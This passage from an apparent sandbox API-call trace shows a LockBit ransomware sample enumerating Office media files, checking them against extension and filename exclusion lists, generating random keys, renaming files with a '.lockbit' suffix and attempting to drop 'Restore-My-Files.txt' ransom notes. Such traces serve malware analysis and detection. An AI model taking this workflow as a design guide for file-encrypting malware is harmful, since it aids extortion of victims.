(lpString1=".frm", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.015] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.015] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.015] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.015] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.015] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.015] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.015] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.015] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216858.WMF.lockbit") returned 70 [0197.015] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216858.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0216858.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.016] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.016] malloc (_Size=0x40068) returned 0x3df0008 [0197.016] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11716) returned 1 [0197.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.018] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216858.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216858.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.023] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.023] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.024] free (_Block=0x1fa2ed8) [0197.024] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216858.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.024] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.024] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8cb3500, ftCreationTime.dwHighDateTime=0x1be6c1d, ftLastAccessTime.dwLowDateTime=0xbd539100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd8cb3500, ftLastWriteTime.dwHighDateTime=0x1be6c1d, nFileSizeHigh=0x0, nFileSizeLow=0x1aea, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0217698.WMF", cAlternateFileName="")) returned 1 [0197.024] lstrcmpiW (lpString1=".", lpString2="J0217698.WMF") returned -1 [0197.024] lstrcmpiW (lpString1="..", lpString2="J0217698.WMF") returned -1 [0197.024] PathFindExtensionW (pszPath="J0217698.WMF") returned=".WMF" [0197.024] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.024] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.024] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.025] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.025] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.026] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0217698.WMF") returned 1 [0197.026] lstrcmpiW (lpString1="ntldr", lpString2="J0217698.WMF") returned 1 [0197.026] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0217698.WMF") returned 1 [0197.026] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0217698.WMF") returned -1 [0197.026] lstrcmpiW (lpString1="autorun.inf", lpString2="J0217698.WMF") returned -1 [0197.026] lstrcmpiW (lpString1="thumbs.db", lpString2="J0217698.WMF") returned 1 [0197.026] lstrcmpiW (lpString1="iconcache.db", lpString2="J0217698.WMF") returned -1 [0197.026] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.026] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0217698.WMF") returned=".WMF" [0197.026] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.027] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.027] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.028] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0217698.WMF.lockbit") returned 70 [0197.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0217698.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0217698.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.029] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.029] malloc (_Size=0x40068) returned 0x3df0008 [0197.029] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6890) returned 1 [0197.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.030] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.035] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0217698.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0217698.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.035] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.035] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.036] free (_Block=0x1fa2ed8) [0197.036] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0217698.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.036] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.037] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bfdb600, ftCreationTime.dwHighDateTime=0x1be7a36, ftLastAccessTime.dwLowDateTime=0xbd539100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7bfdb600, ftLastWriteTime.dwHighDateTime=0x1be7a36, nFileSizeHigh=0x0, nFileSizeLow=0x3838, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0221903.WMF", cAlternateFileName="")) returned 1 [0197.037] lstrcmpiW (lpString1=".", lpString2="J0221903.WMF") returned -1 [0197.037] lstrcmpiW (lpString1="..", lpString2="J0221903.WMF") returned -1 [0197.037] PathFindExtensionW (pszPath="J0221903.WMF") returned=".WMF" [0197.037] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.037] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.038] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0221903.WMF") returned 1 [0197.039] lstrcmpiW (lpString1="ntldr", lpString2="J0221903.WMF") returned 1 [0197.039] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0221903.WMF") returned 1 [0197.039] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0221903.WMF") returned -1 [0197.039] lstrcmpiW (lpString1="autorun.inf", lpString2="J0221903.WMF") returned -1 [0197.039] lstrcmpiW (lpString1="thumbs.db", lpString2="J0221903.WMF") returned 1 [0197.039] lstrcmpiW (lpString1="iconcache.db", lpString2="J0221903.WMF") returned -1 [0197.039] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.039] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0221903.WMF") returned=".WMF" [0197.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.039] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.039] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.040] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.040] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0221903.WMF.lockbit") returned 70 [0197.040] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0221903.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0221903.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.042] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.042] malloc (_Size=0x40068) returned 0x3df0008 [0197.042] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14392) returned 1 [0197.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.042] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.043] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.048] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0221903.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0221903.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.048] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.048] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.049] free (_Block=0x1fa2ed8) [0197.049] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0221903.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.049] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.050] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7bae00, ftCreationTime.dwHighDateTime=0x1be7a37, ftLastAccessTime.dwLowDateTime=0xbd539100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7d7bae00, ftLastWriteTime.dwHighDateTime=0x1be7a37, nFileSizeHigh=0x0, nFileSizeLow=0x78a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0222015.WMF", cAlternateFileName="")) returned 1 [0197.050] lstrcmpiW (lpString1=".", lpString2="J0222015.WMF") returned -1 [0197.050] lstrcmpiW (lpString1="..", lpString2="J0222015.WMF") returned -1 [0197.050] PathFindExtensionW (pszPath="J0222015.WMF") returned=".WMF" [0197.050] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.050] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.051] lstrcmpiW 